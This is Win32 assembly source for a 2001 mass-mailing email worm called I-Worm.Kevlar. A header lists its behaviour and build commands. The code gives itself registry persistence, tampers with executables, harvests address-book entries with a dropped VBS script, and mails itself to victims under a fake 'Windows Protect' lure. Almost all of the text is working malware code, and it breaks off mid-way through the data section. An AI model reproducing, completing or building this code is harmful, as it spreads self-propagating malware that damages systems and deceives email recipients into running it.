comment # Name : I-Worm.Kevlar Author : PetiK Date : August 7th 2001 - August 16th 2001 Size : 5120 byte Action : Copy itself to %System%\Kevlar32.exe hidden attribute %System%\MScfg32.exe normal attribute Add HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kevlar32 = %System%\Kevlar32.exe * Infect %Windir%\C???????.exe file on writing as "PetiK" in the file * Infect %Windir%\*.exe It add .htm and create a new file with ActiveX * Create C:\__.vbs This filetake all address in th e Address Book at save them in the %windir%\AddBook.txt. The worm scan this file to find the address and send a new mail : Subject : Windows Protect !! Body : The smallest software to stop your computer to bug in each time. I have found this program on WWW.KEVLAR-PROTECT.COM Take a look at the attchment. Bye and have a nice day. Attachment : MScfg32.exe * It creates the %windir%\MSinfo32.txt. I look like this : [File Infected] => Name of C???????.exe file infected CLEANMGR.EXE=Infected by W32.Kevlar.PetiK CVTAPLOG.EXE=Infected by W32.Kevlar.PetiK [EMail saved] => Some address found in the address book first@mail.com=Next victim second@mail.com=Next victim To build the worm: tasm32 /M /ML Kevlar tlink32 -Tpe -aa -x Kevlar,,,import32 upx -9 Kevlar.exe To delete the worm: @echo off del %windir%\system\Kevlar32.exe del %windir%\system\MScfg32.exe del %windir%\*.exe.htm del %windir%\MSinfo32.txt del %windir%\AddBook.txt # .586p .model flat .code JUMPS callx macro a extrn a:proc call a endm include useful.inc DEBUT: F_NAME: push 50 mov esi,offset Orig push esi push 0 callx GetModuleFileNameA mov edi,offset CopyName2 push edi push 50 push edi callx GetSystemDirectoryA add edi,eax mov eax,'cSM\' stosd mov eax,'23gf' stosd mov eax,'exe.' stosd pop edi push 0 push edi push esi callx CopyFileA mov edi,offset CopyName push edi push 50 push edi callx GetSystemDirectoryA add edi,eax mov al,'\' stosb mov eax,'lveK' stosd mov eax,'23ra' stosd mov eax,'exe.' stosd pop edi push esi callx GetFileAttributesA cmp eax,1 je SUITE push 0 push edi push esi callx CopyFileA push 01h push edi callx SetFileAttributesA REG: pushad @pushsz "SHLWAPI.dll" callx LoadLibraryA test eax,eax jz FIN mov edi,eax @pushsz "SHSetValueA" push edi callx GetProcAddress test eax,eax jz FIN mov esi,eax push 08h push offset CopyName push 01h @pushsz "Kevlar32" @pushsz "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" push 80000002h call esi push edi callx FreeLibrary popad call Nick mov edi,offset nickname push 40h @pushsz "Hello, my name is :" push edi push 0 callx MessageBoxA call Infect jmp FIN SUITE: call Infect2 VB_F: pushad push 00h push 80h push 02h push 00h push 01h push 40000000h @pushsz "C:\__.vbs" callx CreateFileA test eax,eax xchg edi,eax push 00h push offset octets push VBSSIZE push offset vbsd push edi callx WriteFile push edi callx CloseHandle popad push 1 @pushsz "wscript C:\__.vbs" callx WinExec push 10000 callx Sleep @pushsz "C:\__.vbs" callx DeleteFileA SCAN1: mov edi,offset addbook push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,"ddA\" stosd mov eax,"kooB" stosd mov eax,"txt." stosd xor eax,eax stosd call OPEN FIN: push 00h callx ExitProcess Nick Proc mov edi,offset nickname callx GetTickCount push 9 pop ecx xor edx,edx div ecx inc edx mov ecx,edx name_g: push ecx callx GetTickCount push 'Z'-'A' pop ecx xor edx,edx div ecx xchg eax,edx add al,'A' stosb callx GetTickCount push 100 pop ecx xor edx,edx div ecx push edx callx Sleep pop ecx loop name_g ret Nick EndP Infect Proc pushad push 50 push offset WinPath callx GetWindowsDirectoryA push offset WinPath callx SetCurrentDirectoryA FFF: push offset Search @pushsz "C???????.exe" callx FindFirstFileA inc eax je F_INF dec eax mov [exeHdl],eax I_FILE: mov verif,0 xor eax,eax push eax push eax push 03h push eax push eax push 80000000h or 40000000h push offset Search.cFileName callx CreateFileA inc eax jz FNF dec eax xchg eax,ebx xor eax,eax push eax push eax push eax push 04h push eax push ebx callx CreateFileMappingA test eax,eax jz CL1 xchg eax,ebp xor eax,eax push eax push eax push eax push 06h push ebp callx MapViewOfFile test eax,eax jz CL2 xchg eax,edi mov esi,eax cmp word ptr [esi],"ZM" jne CL2 cmp byte ptr [esi+18h],"@" jne CL2 cmp word ptr [esi+80h],"EP" jne CL2 cmp byte ptr [esi+12h],"P" je CL2 mov word ptr [esi+12h],"eP" mov word ptr [esi+14h],"it" mov byte ptr [esi+16h],"K" inc verif push edi callx UnmapViewOfFile CL2: push ebp callx CloseHandle CL1: push ebx callx CloseHandle cmp verif,1 jne FNF mov edi,offset InfoFile push edi push 50 push edi callx GetWindowsDirectoryA add edi,eax mov eax,'iSM\' stosd mov eax,'3ofn' stosd mov eax,'xt.2' stosd mov al,'t' stosb pop edi mov esi,edi push esi @pushsz "Infected by W32.Kevlar.PetiK" push offset Search.cFileName @pushsz "File Infected" callx WritePrivateProfileStringA FNF: push offset Search push [exeHdl] callx FindNextFileA test eax,eax jne I_FILE FC: push [exeHdl] callx FindClose F_INF: popad ret Infect EndP Infect2 Proc pushad push 50 push offset WinPath callx GetWindowsDirectoryA push offset WinPath callx SetCurrentDirectoryA FFF2: push offset Search @pushsz "*.exe" callx FindFirstFileA inc eax je F_INF2 dec eax mov [exeHdl],eax I_FILE2: pushad mov edi,offset Search.cFileName push edi callx lstrlen add edi,eax mov eax,"mth." stosd xor eax,eax stosd push 00h push 80h push 02h push 00h push 01h push 40000000h push offset Search.cFileName callx CreateFileA test eax,eax xchg ebp,eax push 00h push offset octets push HTMSIZE push offset htmd push ebp callx WriteFile push ebp callx CloseHandle popad FNF2: push offset Search push [exeHdl] callx FindNextFileA test eax,eax jne I_FILE2 FC2: push [exeHdl] callx FindClose F_INF2: popad ret Infect2 EndP OPEN: pushad push 00h push 80h push 03h push 00h push 01h push 80000000h push offset addbook callx CreateFileA inc eax je NO dec eax xchg eax,ebx xor eax,eax push eax push eax push eax push 02h push eax push ebx callx CreateFileMappingA test eax,eax je F1 xchg eax,ebp xor eax,eax push eax push eax push eax push 04h push ebp callx MapViewOfFile test eax,eax je F2 xchg eax,esi push 00h push ebx callx GetFileSize cmp eax,03h jbe F3 ; is the file empty ?? call SCAN F3: push esi callx UnmapViewOfFile F2: push ebp callx CloseHandle F1: push ebx callx CloseHandle NO: popad ret SCAN: pushad xor edx,edx mov edi,offset m_addr push edi p_c: lodsb cmp al," " je car_s cmp al,0dh je entr1 cmp al,0ah je entr2 cmp al,"!" je f_mail cmp al,"@" je not_a inc edx not_a: stosb jmp p_c car_s: inc esi jmp p_c entr1: xor al,al stosb pop edi test edx,edx je SCAN call SEND_MAIL jmp SCAN entr2: xor al,al stosb pop edi jmp SCAN f_mail: popad ret SEND_MAIL: push 50 push offset save_addr callx GetWindowsDirectoryA @pushsz "\MSinfo32.txt" push offset save_addr callx lstrcat push offset save_addr @pushsz "Next victim" push offset m_addr @pushsz "EMail saved" callx WritePrivateProfileStringA xor eax,eax push eax push eax push offset Message push eax push [MAPIHdl] callx MAPISendMail ret .data ; ===== INSTALLATION ===== Orig db 50 dup (0) CopyName db 50 dup (0) CopyName2 db 50 dup (0) nickname db 11 dup (?) ; ===== INFECTION ===== InfoFile db 50 dup (0) WinPath db 50 dup (0) exeHdl dd ? verif dd ? octets dd ? ; ===== MAIL ===== addbook db 50 dup (0) save_addr db 50 dup (0) m_addr db 128 dup (?) MAPIHdl dd 0 subject db "Windows Protect !!",00h body db "The smallest software to stop your computer to bug in each time.",0dh,0ah db "I have found this program on WWW.KEVLAR-PROTECT.COM",0dh,0ah,0dh,0ah db "Take a look at the attchment.",0dh,0ah,0dh,0ah db 09h,09h,"Bye and have a nice day.",00h NameFrom db "Your friend",00h Message dd ? dd offset subject dd offset body dd ? dd ? dd ? dd 2 dd offset MsgFrom dd 1 dd offset MsgTo dd 1 dd offset Attach MsgFrom dd ? dd ? dd NameFrom dd ? dd ? dd ? MsgTo dd ? dd 1 dd offset m_addr dd offset m_addr dd ? dd ? Attach dd ? dd ? dd ? dd offset CopyName2 dd ? dd ? htmd: db '